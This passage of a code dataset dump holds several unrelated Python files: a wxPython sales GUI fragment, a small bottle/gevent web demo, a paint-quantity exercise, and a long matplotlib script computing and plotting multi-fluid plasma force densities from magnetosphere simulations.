style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)\n\n if dlg.ShowModal() == wx.ID_OK:\n plugin = wx.GetApp().getPluginFromConfig(INIT_PARSER)\n parser = partial(plugin.plugin_object.parse,CSV)\n self.backend.InitDatabase(dlg.GetPath(),parser=parser)\n self.statusbar.PushStatusText('Initialized database from file \"{}\"'\\\n .format(dlg.GetPath()))\n\n dlg.Destroy()\n\n\n def OnGenerateStatement(self, evt):\n dlg = StatementCreationWizard(self)\n if dlg.ShowModal() == wx.ID_OK:\n startDate, endDate = dlg.GetDates()\n path = dlg.GetPath()\n output_type = dlg.GetOutputType()\n\n writer = wx.GetApp().getPluginFromConfig({ STATEMENT: STATEMENT_WRITER,\n REGISTRY: REGISTRY_WRITER }[output_type]).plugin_object\n if output_type == STATEMENT:\n result = self.backend.GenerateStatement(startDate, endDate,\n changes_only=dlg.WantChangesOnly())\n else:\n result = self.backend.GenerateRegistry(startDate, endDate,\n changes_only=dlg.WantChangesOnly())\n\n writer.write(path, result, self.backend.QI(), startDate, endDate)\n self.statusbar.PushStatusText('Generated output file \"{}\"'.format(path))\n\n dlg.Destroy()\n\n def OnViewHistory(self, evt):\n self.history_viewer.Show(True)\n self.history_viewer.Raise()\n\n\n","repo_name":"miheerdew/SalesMan","sub_path":"salesman/lib/gui/MainFrame.py","file_name":"MainFrame.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30763998535","text":"import gevent.monkey, json, pickle\nfrom bottle import route, run, get, post, request\nfrom urllib.request import urlopen\n\ngdata 
= {}\n\ngevent.monkey.patch_all()\nurls = ['https://jsonplaceholder.typicode.com/users']\n\ndef print_head(url):\n global gdata\n print('Starting {}'.format(url))\n gdata['users'] = urlopen(url).read()\n #print(\"gdataj->\" + str(gdata))\n\n@get('/gthreads')\ndef gthreads():\n jobs = [gevent.spawn(print_head, _url) for _url in urls]\n gevent.wait(jobs)\n obj = json.loads(gdata.get('users').decode(\"utf-8\"))\n return obj[0]\n\nrun(host='localhost', port=8080, debug=True)\n","repo_name":"aegor/pythoncourses","sub_path":"controller_gthreads_test.py","file_name":"controller_gthreads_test.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18783534773","text":"x = float(input())\ny = float(input())\nh = float(input())\n\nrazhod_zelena_boya = 3.4\nrazhod_chervena_boya = 4.3\n\nvrata = 1.2 * 2\nprozorec = 1.5 * 1.5\nzadna_stena = x * x\npredna_stena = (x * x) - vrata\nstranichna_stena = (x * y) - prozorec\n\nplosht_steni = predna_stena + zadna_stena + 2 * stranichna_stena\n\npokriv_pravoygalnik = x * y\npokriv_triygalnik = (x * h) / 2\n\nplosht_pokriv = 2 * (pokriv_pravoygalnik + pokriv_triygalnik)\n\nlitri_zelena_boq = plosht_steni / razhod_zelena_boya\nlitri_chervena_boq = plosht_pokriv / razhod_chervena_boya\n\nprint(f\"{litri_zelena_boq:.2f}\")\nprint(f\"{litri_chervena_boq:.2f}\")","repo_name":"mKasapova/my-repo","sub_path":"PycharmProjects/Exercise1/exercises/house_painting.py","file_name":"house_painting.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28909213824","text":"import sys\nimport os\nimport glob\nimport gzip\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport matplotlib.dates as md\nimport matplotlib.patches as patches\nimport matplotlib.gridspec as gridspec\nimport scipy.interpolate as sci\nfrom matplotlib.colors import LogNorm\nimport matplotlib.colors as colors\nimport datetime as dt\nfrom matplotlib.figure import Figure\nfrom matplotlib import rc\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib import ticker\nimport cProfile\nimport multiprocessing\nfrom classes import *\nimport plotting as myplot\n\n\n\ndef momentum(k,GM,reversal,cut,mode):\n home=os.getcwd()+'/'\n run =GM+'/'+reversal+'/'\n datalocation = home+run\n hr,mn=timestring(k)\n time = 't00'+hr+mn\n if not os.path.exists(datalocation):\n sys.exit('path does not exist')\n filelist=[]\n filelist.extend(glob.glob(datalocation+cut+'*'+time+'*'))\n filepath = filelist[0]\n filename = PlotProperties(filepath,-40.0,20.0,-20.0,20.0,True,cut,mode)\n data,connectivity,timetick = filename.get_data()\n xyz,bfield,J,stateFluid,nFluid=filename.data_readableSI(data) #everything is in SI Units\n lines = len(xyz)\n jxb = np.zeros((len(xyz),3))\n gyration,udiff = np.zeros((len(xyz),3,nFluid)),np.zeros((len(xyz),3,nFluid))\n jxb = np.cross(J,bfield)\n row,column=connectivity.shape\n # initialize arrays\n jxbcenterx,jxbcenterz = np.zeros(row),np.zeros(row)\n xcenter,zcenter = np.zeros(row),np.zeros(row)\n nratcenter = np.zeros((row,nFluid))\n dpedx,dpedz = np.zeros(row),np.zeros(row) \n nrat = np.zeros((len(xyz),nFluid))\n bodyx,bodyz = np.zeros((row,nFluid)),np.zeros((row,nFluid))\n friction = np.zeros((len(xyz),3,nFluid))\n gyrationcent = np.zeros((row,3,nFluid))\n frictioncent = np.zeros((row,3,nFluid))\n vdiffmagnorm = 
np.zeros((len(xyz),nFluid,nFluid))\n vdiff = np.zeros((len(xyz),3,nFluid,nFluid))\n uplus = np.zeros((len(xyz),3))\n qe = 1.602176621e-19\n amutokg = 1.660539e-27\n kgtoamu = 1./amutokg\n Re = 6.3781e6\n tau = 1000. #cutoff time scale\n uc = 100.*1.e3 #100 km/s to m/s cutoff velocity\n alpha = 2.\n p = connectivity-1 #recalibrate array index by 1 to match python from Fortran\n nDensity = np.zeros((len(xyz),nFluid))\n pressure = np.zeros((len(xyz),nFluid))\n #Assign to number density array\n for i in range(0,nFluid):\n nDensity[:,i] = stateFluid[:,0,i]*kgtoamu #convert mass density in SI units to amu/m^3\n pressure[:,i] = stateFluid[:,4,i]\n \n if (GM == 'SwHIonoO'): #change mass density to number density for oxygen by dividing by the appropriate mass unit\n nDensity[:,1] = nDensity[:,1]/16. \n if (GM == 'SwIonoO' or GM == 'SwIonoO28amu'):\n nDensity[:,2] = nDensity[:,2]/16.\n\n ntot = np.sum(nDensity,1)\n ptot = np.sum(pressure,1)\n\n #species velocity\n uspecies = np.zeros((len(xyz),3,nFluid))\n ###### calculate the gyration term\n # first calculate u+ (we are ignoring charge since we have a singly ionized plasma)\n uspecies = stateFluid[:,1:4,:]\n # calculate the numerator by calculating n_i*u_i for each direction\n for d in range(0,3):\n for i in range(0,nFluid):\n uplus[:,d] = uplus[:,d]+nDensity[:,i]*uspecies[:,d,i]\n\n # calculate u+ by dividing by the total number density\n for d in range(0,3):\n uplus[:,d] = np.divide(uplus[:,d],ntot[:])\n\n # there is no charge given that the ion and electron species have charge e\n\n # Calculate the velocity in the charge averaged frame\n for d in range(0,3):\n for i in range(0,nFluid):\n udiff[:,d,i] = uspecies[:,d,i]-uplus[:,d]\n ucrossb = np.zeros((len(xyz),3,nFluid))\n # Calculate the u x B term\n for i in range(0,nFluid):\n ucrossb[:,:,i] = np.cross(udiff[:,:,i],bfield)\n\n # Multiply by the charge and density of the ion to obtain the gyration term\n for d in range(0,3):\n for i in range(0,nFluid):\n gyration[:,d,i] = qe*nDensity[:,i]*ucrossb[:,d,i]\n ##### End of calculation of the gyration term\n \n \n ##### calculate friction\n # calculate difference between ion velocities, and normalized velocities\n for i in range(0,nFluid):\n for j in range(0,nFluid):\n vdiff[:,0:3,i,j] = stateFluid[:,1:4,j]-stateFluid[:,1:4,i]\n vdiffmagnorm[:,i,j] = [(np.sqrt(np.dot(vdiff[k,0:3,i,j],vdiff[k,0:3,i,j]))/uc)**alpha/tau for k in range(0,len(xyz))]\n\n #statefluid is used because it is the mass density\n for d in range(0,3):\n for i in range(0,nFluid):\n for j in range(0,nFluid):\n friction[:,d,i] = friction[:,d,i]+np.minimum(stateFluid[:,0,j],stateFluid[:,0,i])*vdiff[:,d,i,j]*vdiffmagnorm[:,i,j]\n\n \n #### End of friction calculation\n\n ##### This is the start of the calculation for the body forces\n # Calculate the fraction of each ion number density to total density\n for i in range(0,nFluid):\n nrat[:,i]=np.divide(nDensity[:,i],ntot)\n pe = 0.2*ptot #electron pressure\n \n\n \n for i in range(0,row):\n jxbcenterbottom = (jxb[p[i,1],0]+jxb[p[i,0],0])/2.\n jxbcenterup = (jxb[p[i,2],0]+jxb[p[i,3],0])/2.\n jxbcenterx[i] = (jxbcenterbottom+jxbcenterup)/2.\n jxbcenterbottom = (jxb[p[i,1],2]+jxb[p[i,0],2])/2.\n jxbcenterup = (jxb[p[i,2],2]+jxb[p[i,3],2])/2.\n jxbcenterz[i] = (jxbcenterbottom+jxbcenterup)/2.\n xcenter[i] = 0.5*(xyz[p[i,1],0]+xyz[p[i,0],0])/Re #center values of x and z in each cell\n zcenter[i] = 0.5*(xyz[p[i,1],2]+xyz[p[i,2],2])/Re\n \n ''' electron pressure gradient calculation\n calculate grad p in x direction by computing the slope of 
the bottom row and top row of the cell and average them\n calculate grad p in z direction by computing the slope\n of the left side and right side of the cell and average them\n '''\n dpedx[i] = 0.5*(pe[p[i,1]]-pe[p[i,0]]+pe[p[i,2]]-pe[p[i,3]])/\\\n ((xyz[p[i,1],0]-xyz[p[i,0],0]))\n dpedz[i] = 0.5*(pe[p[i,2]]-pe[p[i,1]]+pe[p[i,3]]-pe[p[i,0]])/\\\n ((xyz[p[i,2],2]-xyz[p[i,1],2]))\n for j in range(0,nFluid):\n nratcenter = 0.25*(nrat[p[i,0],j]+nrat[p[i,1],j]+\\\n nrat[p[i,2],j]+nrat[p[i,3],j])\n bodyx[i,j] = nratcenter*(jxbcenterx[i]-dpedx[i])\n bodyz[i,j] = nratcenter*(jxbcenterz[i]-dpedz[i])\n #### End of body force term calculations\n\n # Calculate center values of gyration and friction terms\n for i in range(0,row):\n for j in range(0,nFluid):\n gyrationcent[i,:,j] = 0.25*(gyration[p[i,0],:,j]+ \\\n gyration[p[i,1],:,j]+ \\\n gyration[p[i,2],:,j]+ \\\n gyration[p[i,3],:,j])\n frictioncent[i,:,j] = 0.25*(friction[p[i,0],:,j]+ \\\n friction[p[i,1],:,j]+ \\\n friction[p[i,2],:,j]+ \\\n friction[p[i,3],:,j])\n \n bodyx = bodyx/amutokg/1.e4 #convert to N/m^3 to amu/cm^2/s^2\n bodyz = bodyz/amutokg/1.e4\n gyrationcent = gyrationcent/amutokg/1.e4\n frictioncent = frictioncent/amutokg/1.e4\n return(xcenter,zcenter,bodyx,bodyz,gyrationcent,frictioncent,nFluid)\n\ndef specieslabelpaper(GM):\n if (GM == 'SwIono'):\n Title = [r'Sw H$^+$ ',r'Iono H$^+$ ']\n Filename = ['SwH','IonoH']\n if (GM == 'SwHIonoO'):\n Title = [r'Sw H$^+$ ',r'Iono O$^+$ ']\n Filename = ['SwH','O']\n if (GM == 'SwIonoO' or GM =='SwIonoO28amu'):\n Title = [r'Sw H$^+$ ', r'Iono H$^+$ ',r'Iono O$^+$ ']\n Filename = ['SwH','IonoH','O']\n return(Title,Filename)\n\ndef plotmomentum(o): #perform 2d interpolation to calculate the force density\n GM = ['SwIono','SwHIonoO','SwIonoO','SwIonoO28amu']\n Geopause = ['Density Geopause','Mass Density Geopause','Pressure Geopause']\n Title=['Sw H + Iono H','Sw H + Iono O','Sw H + Iono H + O','Sw H + Iono H + O at 28 amu/cc']\n reversal = ['runFlipNorth','runFlipSouth']\n Legends = ['Number Density Geopause','Mass Density Geopause','Pressure Geopause','Magnetopause']\n IMF = [' for South-to-North IMF',' for North-to-South IMF']\n quantity = ['geopause','rho','pressure']\n mode = '2d'\n minimum = 12*60#0\n plotnumber = 1+12*60\n a = 0\n colorsquant= ['sienna','green','k']\n cmaps = ['seismic','seismic','bwr']\n loffset = [0.25,0.25,0.25,0.25]\n cut = 'y'\n N = 1000\n rc('font',family='serif')\n rc('text', usetex=True)\n Momentum = np.array([['gyration in the x-direction','bulk terms in the x-direction','friction in the x-direction'],['gyration in the z-direction','bulk terms in the z-direction','friction in the z-direction']])\n linthreshold = np.array([[1.e4,1.e4,1e2],[1e4,1e4,1e2]])\n vmins=np.array([[-1.e7,-1.e7,-1.e5],[-1.e7,-1.e7,-1.e5]])\n vmaxs=np.array([[1.e7,1.e7,1.e5],[1e7,1.e7,1.e5]])\n letter = np.array([['(a)','(b)','(c)'],['(d)','(e)','(f)']])\n for a in range(0,2):\n for k in range(minimum,plotnumber):\n \n p = ordinate(cut)\n if(p==1):\n ylabel = r'Y [$R_E$]'\n if(p==2):\n ylabel = r'Z [$R_E$]' \n xc,zc,bodyxx,bodyzz,gyrationcent,frictioncent,nFluid=momentum(k,GM[o],reversal[a],cut,mode)\n #xold,zold,bodyx,bodyz = bodyforcespecies(k,GM[o],reversal[a],cut,mode)\n xci,zci = gridpoints(xc,N),gridpoints(zc,N)\n Titleadd,Extension = specieslabelpaper(GM[o])\n for m in range(0,nFluid):\n fig,ax=plt.subplots(2,3,figsize=(15,10))\n gyrationxi =twodinterpolate(xc,zc,xci,zci,gyrationcent[:,0,m])\n gyrationzi = twodinterpolate(xc,zc,xci,zci,gyrationcent[:,2,m])\n bodyxi = 
twodinterpolate(xc,zc,xci,zci,bodyxx[:,m])\n bodyzi = twodinterpolate(xc,zc,xci,zci,bodyzz[:,m])\n frictionxi =twodinterpolate(xc,zc,xci,zci,frictioncent[:,0,m])\n frictionzi = twodinterpolate(xc,zc,xci,zci,frictioncent[:,2,m])\n xx = np.array([[xci,xci,xci],[xci,xci,xci]])\n yy = np.array([[zci,zci,zci],[zci,zci,zci]])\n zz = np.array([[gyrationxi,bodyxi,frictionxi],[gyrationzi,bodyzi,frictionzi]])\n for i in range(0,2):\n for j in range(0,3):\n pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],shading='nearest',norm=colors.SymLogNorm(linthresh=linthreshold[i,j],linscale=1,vmin=vmins[i,j],vmax=vmaxs[i,j],base=10),cmap=cmaps[j])\n l=myplot.drawgeopause(ax[i,j],k,GM[o],reversal[a],cut)\n lc=myplot.plotlastclosedcomponent(ax[i,j],k,GM[o],reversal[a],cut)\n ax[i,j].set_xlim(-80,20)\n ax[i,j].set_ylim(-50,50)\n clb=fig.colorbar(pcm, ax=ax[i,j])\n clb.set_label('[amu/cm$^2$/sec$^2$]')\n draw_earth(ax[i,j])\n if(j==0):\n ax[i,j].set_ylabel(r'Z [$R_E$]')\n if(i==1):\n ax[i,j].set_xlabel(r'X [$R_E$]')\n ax[i,j].set_title(letter[i,j]+' '+Titleadd[m]+Momentum[i,j])\n #ax[i,j].text(0.9,0.5,letter[i,j],transform=ax[i,j].transAxes,fontsize=10,color='black')\n Suptitle = Title[o]\n hr,mn=timestring(k)\n plt.suptitle(Suptitle+IMF[a]+' at T='+hr+':'+mn) \n print(hr,mn,GM[o],reversal[a])\n home=os.getcwd()+'/'\n plt.figlegend((l[0],l[1],l[2],lc),Legends,(loffset[o],0.01),markerscale=3,ncol=4,fontsize=10,frameon=False)\n plotlocation = home+'Momentumwithlastclosed/'+GM[o]+'/'+reversal[a]+'/'\n if not os.path.exists(plotlocation):\n os.makedirs(plotlocation)\n print('making a plot directory')\n plotpath = plotlocation+'meridionalmomentum'+Extension[m]+'t'+hr+mn+'.png'\n fig.savefig(plotpath,dpi=300)\n plt.close(fig)\n print('plot saved to:',plotpath)\n \n return\n\ndef plotratiorelative(o): #plot the relative ratio of the magnitude of the force densities to each other\n GM = ['SwIono','SwHIonoO','SwIonoO','SwIonoO28amu']\n Geopause = ['Density Geopause','Mass Density Geopause','Pressure Geopause']\n Title=['Sw H + Iono H','Sw H + Iono O','Sw H + Iono H + O','Sw H + Iono H + O at 28 amu/cc']\n reversal = ['runFlipNorth','runFlipSouth']\n Legends = ['Number Density Geopause','Mass Density Geopause','Pressure Geopause','Magnetopause']\n IMF = [' for South-to-North IMF',' for North-to-South IMF']\n quantity = ['geopause','rho','pressure']\n mode = '2d'\n minimum = 12*60#0\n plotnumber = 1+12*60\n a = 0\n colorsquant= ['sienna','green','k']\n cmaps = ['seismic','seismic','bwr']\n loffset = [0.25,0.25,0.25,0.25]\n cut = 'y'\n N = 1000\n rc('font',family='serif')\n rc('text', usetex=True)\n Momentum = np.array([['gyration/body force in x-direction','friction/body force in the x-direction','friction/gyration in the x-direction'],['gyration/body force in the z-direction','friction/body force in the z-direction','gyration/friction in the z-direction']])\n linthreshold = np.array([[1.e4,1.e4,1e2],[1e4,1e4,1e2]])\n\n for a in range(0,2):\n for k in range(minimum,plotnumber):\n \n p = ordinate(cut)\n if(p==1):\n ylabel = r'Y [$R_E$]'\n if(p==2):\n ylabel = r'Z [$R_E$]' \n xc,zc,bodyxx,bodyzz,gyrationcent,frictioncent,nFluid=momentum(k,GM[o],reversal[a],cut,mode)\n #xold,zold,bodyx,bodyz = bodyforcespecies(k,GM[o],reversal[a],cut,mode)\n xci,zci = gridpoints(xc,N),gridpoints(zc,N)\n Titleadd,Extension = specieslabelpaper(GM[o])\n for m in range(0,nFluid):\n fig,ax=plt.subplots(2,3,figsize=(15,10))\n gyrationxi =np.absolute(twodinterpolate(xc,zc,xci,zci,gyrationcent[:,0,m]))\n gyrationzi = 
np.absolute(twodinterpolate(xc,zc,xci,zci,gyrationcent[:,2,m]))\n bodyxi = np.absolute(twodinterpolate(xc,zc,xci,zci,bodyxx[:,m]))\n bodyzi = np.absolute(twodinterpolate(xc,zc,xci,zci,bodyzz[:,m]))\n frictionxi =np.absolute(twodinterpolate(xc,zc,xci,zci,frictioncent[:,0,m]))\n frictionzi = np.absolute(twodinterpolate(xc,zc,xci,zci,frictioncent[:,2,m]))\n gyrtobfxi,gyrtobfzi = np.divide(gyrationxi,bodyxi),np.divide(gyrationzi,bodyzi)\n frictobfxi,frictobfzi = np.divide(frictionxi,bodyxi),np.divide(frictionzi,bodyzi)\n frictogyrxi,frictogyrzi = np.divide(frictionxi,gyrationxi),np.divide(frictionzi,gyrationzi)\n xx = np.array([[xci,xci,xci],[xci,xci,xci]])\n yy = np.array([[zci,zci,zci],[zci,zci,zci]])\n zz = np.array([[gyrtobfxi,frictobfxi,frictogyrxi],[gyrtobfzi,frictobfzi,frictogyrzi]])\n for i in range(0,2):\n for j in range(0,3):\n #pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],shading='nearest',vmin=0,vmax=10,cmap='magma')\n pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],shading='nearest',norm=colors.LogNorm(vmin=1.e-2,vmax=1.e2),cmap='magma')\n l=myplot.drawgeopause(ax[i,j],k,GM[o],reversal[a],cut)\n lc=myplot.plotlastclosedcomponent(ax[i,j],k,GM[o],reversal[a],cut)\n ax[i,j].set_xlim(-80,20)\n ax[i,j].set_ylim(-50,50)\n clb=fig.colorbar(pcm, ax=ax[i,j])\n clb.set_label('Fractional Force Density')\n draw_earth(ax[i,j])\n if(j==0):\n ax[i,j].set_ylabel(r'Z [$R_E$]')\n if(i==1):\n ax[i,j].set_xlabel(r'X [$R_E$]')\n ax[i,j].set_title(Titleadd[m]+Momentum[i,j])\n Suptitle = Title[o]\n hr,mn=timestring(k)\n plt.suptitle(Suptitle+IMF[a]+' at T='+hr+':'+mn) \n print(hr,mn,GM[o],reversal[a])\n home=os.getcwd()+'/'\n plt.figlegend((l[0],l[1],l[2],lc),Legends,(loffset[o],0.01),markerscale=3,ncol=4,fontsize=10,frameon=False)\n plotlocation = home+'MomentumRatio/'+GM[o]+'/'+reversal[a]+'/'\n if not os.path.exists(plotlocation):\n os.makedirs(plotlocation)\n print('making a plot directory')\n plotpath = plotlocation+'meridionalmomentumratiorelative'+Extension[m]+'t'+hr+mn+'.png'\n fig.savefig(plotpath,dpi=300)\n plt.close(fig)\n print('plot saved to:',plotpath)\n return\n\ndef plotforceratio(o): #plot the relative ratio of the magnitude of the force densities to the magnitude of the total force density\n GM = ['SwIono','SwHIonoO','SwIonoO','SwIonoO28amu']\n Geopause = ['Density Geopause','Mass Density Geopause','Pressure Geopause']\n Title=['Sw H + Iono H','Sw H + Iono O','Sw H + Iono H + O','Sw H + Iono H + O at 28 amu/cc']\n reversal = ['runFlipNorth','runFlipSouth']\n Legends = ['Number Density Geopause','Mass Density Geopause','Pressure Geopause','Magnetopause']\n IMF = [' for South-to-North IMF',' for North-to-South IMF']\n quantity = ['geopause','rho','pressure']\n mode = '2d'\n minimum = 12*60#0\n plotnumber = 1+12*60\n a = 0\n colorsquant= ['sienna','green','k']\n cmaps = ['seismic','seismic','bwr']\n loffset = [0.25,0.25,0.25,0.25]\n cut = 'y'\n N = 1000\n rc('font',family='serif')\n rc('text', usetex=True)\n Momentum = np.array([['gyration/total force in x-direction','body force/total force in the x-direction','friction/total force in the x-direction'],['gyration/total force in the z-direction','body force/total force in the z-direction','friction/total force in the z-direction']])\n\n for a in range(0,2):\n for k in range(minimum,plotnumber):\n \n p = ordinate(cut)\n if(p==1):\n ylabel = r'Y [$R_E$]'\n if(p==2):\n ylabel = r'Z [$R_E$]' \n xc,zc,bodyxx,bodyzz,gyrationcent,frictioncent,nFluid=momentum(k,GM[o],reversal[a],cut,mode)\n #xold,zold,bodyx,bodyz = 
bodyforcespecies(k,GM[o],reversal[a],cut,mode)\n xci,zci = gridpoints(xc,N),gridpoints(zc,N)\n Titleadd,Extension = specieslabelpaper(GM[o])\n for m in range(0,nFluid):\n fig,ax=plt.subplots(2,3,figsize=(15,10))\n gyrationxi =twodinterpolate(xc,zc,xci,zci,gyrationcent[:,0,m])\n gyrationzi = twodinterpolate(xc,zc,xci,zci,gyrationcent[:,2,m])\n bodyxi = twodinterpolate(xc,zc,xci,zci,bodyxx[:,m])\n bodyzi = twodinterpolate(xc,zc,xci,zci,bodyzz[:,m])\n frictionxi =twodinterpolate(xc,zc,xci,zci,frictioncent[:,0,m])\n frictionzi = twodinterpolate(xc,zc,xci,zci,frictioncent[:,2,m])\n totalfxi = gyrationxi+bodyxi+frictionxi\n totalfzi = gyrationzi+bodyzi+frictionzi\n \n gyrtototfxi,gyrtototfzi = np.absolute(np.divide(gyrationxi,totalfxi)),np.absolute(np.divide(gyrationzi,totalfzi))\n bodytototfxi,bodytototfzi = np.absolute(np.divide(bodyxi,totalfxi)),np.absolute(np.divide(bodyzi,totalfzi))\n frictototfxi,frictototfzi = np.absolute(np.divide(frictionxi,totalfxi)),np.absolute(np.divide(frictionzi,totalfzi))\n xx = np.array([[xci,xci,xci],[xci,xci,xci]])\n yy = np.array([[zci,zci,zci],[zci,zci,zci]])\n zz = np.array([[gyrtototfxi,bodytototfxi,frictototfxi],[gyrtototfzi,bodytototfzi,frictototfzi]])\n for i in range(0,2):\n for j in range(0,3):\n pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],shading='nearest',vmin=0,vmax=2,cmap='plasma')\n l=myplot.drawgeopause(ax[i,j],k,GM[o],reversal[a],cut)\n lc=myplot.plotlastclosedcomponent(ax[i,j],k,GM[o],reversal[a],cut)\n ax[i,j].set_xlim(-80,20)\n ax[i,j].set_ylim(-50,50)\n clb=fig.colorbar(pcm, ax=ax[i,j])\n #clb.set_label('Fractional Force Density')\n draw_earth(ax[i,j])\n if(j==0):\n ax[i,j].set_ylabel(r'Z [$R_E$]')\n if(i==1):\n ax[i,j].set_xlabel(r'X [$R_E$]')\n ax[i,j].set_title(Titleadd[m]+Momentum[i,j])\n Suptitle = Title[o]\n hr,mn=timestring(k)\n plt.suptitle(Suptitle+IMF[a]+' at T='+hr+':'+mn) \n print(hr,mn,GM[o],reversal[a])\n home=os.getcwd()+'/'\n plt.figlegend((l[0],l[1],l[2],lc),Legends,(loffset[o],0.01),markerscale=3,ncol=4,fontsize=10,frameon=False)\n plotlocation = home+'MomentumRatio/'+GM[o]+'/'+reversal[a]+'/'\n if not os.path.exists(plotlocation):\n os.makedirs(plotlocation)\n print('making a plot directory')\n plotpath = plotlocation+'meridionalmomentumratioabsolute'+Extension[m]+'t'+hr+mn+'.png'\n fig.savefig(plotpath,dpi=300)\n plt.close(fig)\n print('plot saved to:',plotpath)\n return\n\n\n\ndef plotratiototal(o): #plot the ratio of the magnitude of the force densities relative to the sum of the magnitude of the force densities\n GM = ['SwIono','SwHIonoO','SwIonoO','SwIonoO28amu']\n Geopause = ['Density Geopause','Mass Density Geopause','Pressure Geopause']\n Title=['Sw H + Iono H','Sw H + Iono O','Sw H + Iono H + O','Sw H + Iono H + O at 28 amu/cc']\n reversal = ['runFlipNorth','runFlipSouth']\n Legends = ['Number Density Geopause','Mass Density Geopause','Pressure Geopause','Magnetopause']\n IMF = [' for South-to-North IMF',' for North-to-South IMF']\n quantity = ['geopause','rho','pressure']\n mode = '2d'\n minimum = 12*60#0\n plotnumber = 1+12*60\n a = 0\n colorsquant= ['sienna','green','k']\n cmaps = ['seismic','seismic','bwr']\n loffset = [0.25,0.25,0.25,0.25]\n cut = 'y'\n N = 1000\n rc('font',family='serif')\n rc('text', usetex=True)\n Momentum = np.array([['gyration in the x-direction','bulk terms in the x-direction','friction in the x-direction'],['gyration in the z-direction','bulk terms in the z-direction','friction in the z-direction']])\n linthreshold = np.array([[1.e4,1.e4,1e2],[1e4,1e4,1e2]])\n 
vmins=np.array([[-1.e7,-1.e7,-1.e5],[-1.e7,-1.e7,-1.e5]])\n vmaxs=np.array([[1.e7,1.e7,1.e5],[1e7,1.e7,1.e5]])\n letter = np.array([['(a)','(b)','(c)'],\n ['(d)','(e)','(f)']\n ])\n for a in range(0,2):\n for k in range(minimum,plotnumber):\n \n p = ordinate(cut)\n if(p==1):\n ylabel = r'Y [$R_E$]'\n if(p==2):\n ylabel = r'Z [$R_E$]' \n xc,zc,bodyxx,bodyzz,gyrationcent,frictioncent,nFluid=momentum(k,GM[o],reversal[a],cut,mode)\n #xold,zold,bodyx,bodyz = bodyforcespecies(k,GM[o],reversal[a],cut,mode)\n xci,zci = gridpoints(xc,N),gridpoints(zc,N)\n Titleadd,Extension = specieslabelpaper(GM[o])\n for m in range(0,nFluid):\n fig,ax=plt.subplots(2,3,figsize=(15,10))\n gyrationxi =np.absolute(twodinterpolate(xc,zc,xci,zci,gyrationcent[:,0,m]))\n gyrationzi = np.absolute(twodinterpolate(xc,zc,xci,zci,gyrationcent[:,2,m]))\n bodyxi = np.absolute(twodinterpolate(xc,zc,xci,zci,bodyxx[:,m]))\n bodyzi = np.absolute(twodinterpolate(xc,zc,xci,zci,bodyzz[:,m]))\n frictionxi =np.absolute(twodinterpolate(xc,zc,xci,zci,frictioncent[:,0,m]))\n frictionzi = np.absolute(twodinterpolate(xc,zc,xci,zci,frictioncent[:,2,m]))\n momx = gyrationxi+bodyxi+frictionxi\n momz = gyrationzi+bodyzi+frictionzi\n gyrfracxi,gyrfraczi = np.divide(gyrationxi,momx),np.divide(gyrationzi,momz)\n bodyfracxi,bodyfraczi = np.divide(bodyxi,momx),np.divide(bodyzi,momz)\n fricfracxi,fricfraczi = np.divide(frictionxi,momx),np.divide(frictionzi,momz)\n xx = np.array([[xci,xci,xci],[xci,xci,xci]])\n yy = np.array([[zci,zci,zci],[zci,zci,zci]])\n zz = np.array([[gyrfracxi,bodyfracxi,fricfracxi],[gyrfraczi,bodyfraczi,fricfraczi]])\n for i in range(0,2):\n for j in range(0,3):\n pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],shading='nearest',vmin=0,vmax=1,cmap='plasma')\n #pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],vmin=vmins[i,j],vmax=vmaxs[i,j],cmap=cmaps[j])\n l=myplot.drawgeopause(ax[i,j],k,GM[o],reversal[a],cut)\n lc=myplot.plotlastclosedcomponent(ax[i,j],k,GM[o],reversal[a],cut)\n ax[i,j].set_xlim(-80,20)\n ax[i,j].set_ylim(-50,50)\n clb=fig.colorbar(pcm, ax=ax[i,j])\n clb.set_label('Absolute Abundance')\n draw_earth(ax[i,j])\n if(j==0):\n ax[i,j].set_ylabel(r'Z [$R_E$]')\n if(i==1):\n ax[i,j].set_xlabel(r'X [$R_E$]')\n ax[i,j].set_title(letter[i,j]+' '+Titleadd[m]+Momentum[i,j])\n Suptitle = Title[o]\n hr,mn=timestring(k)\n plt.suptitle(Suptitle+IMF[a]+' at T='+hr+':'+mn) \n print(hr,mn,GM[o],reversal[a])\n home=os.getcwd()+'/'\n plt.figlegend((l[0],l[1],l[2],lc),Legends,(loffset[o],0.01),markerscale=3,ncol=4,fontsize=10,frameon=False)\n plotlocation = home+'MomentumRatio/'+GM[o]+'/'+reversal[a]+'/'\n if not os.path.exists(plotlocation):\n os.makedirs(plotlocation)\n print('making a plot directory')\n plotpath = plotlocation+'meridionalmomentumratio'+Extension[m]+'t'+hr+mn+'.png'\n fig.savefig(plotpath,dpi=300)\n plt.close(fig)\n print('plot saved to:',plotpath)\n return\n\n\ndef plotratioscatter(o):\n GM = ['SwIono','SwHIonoO','SwIonoO','SwIonoO28amu']\n Geopause = ['Density Geopause','Mass Density Geopause','Pressure Geopause']\n Title=['Sw H + Iono H','Sw H + Iono O','Sw H + Iono H + O','Sw H + Iono H + O at 28 amu/cc']\n reversal = ['runFlipNorth','runFlipSouth']\n Legends = ['Number Density Geopause','Mass Density Geopause','Pressure Geopause','Magnetopause']\n IMF = [' for South-to-North IMF',' for North-to-South IMF']\n quantity = ['geopause','rho','pressure']\n mode = '2d'\n minimum = 12*60#0\n plotnumber = 1+12*60\n a = 0\n colorsquant= ['sienna','green','k']\n cmaps = ['seismic','seismic','bwr']\n loffset = 
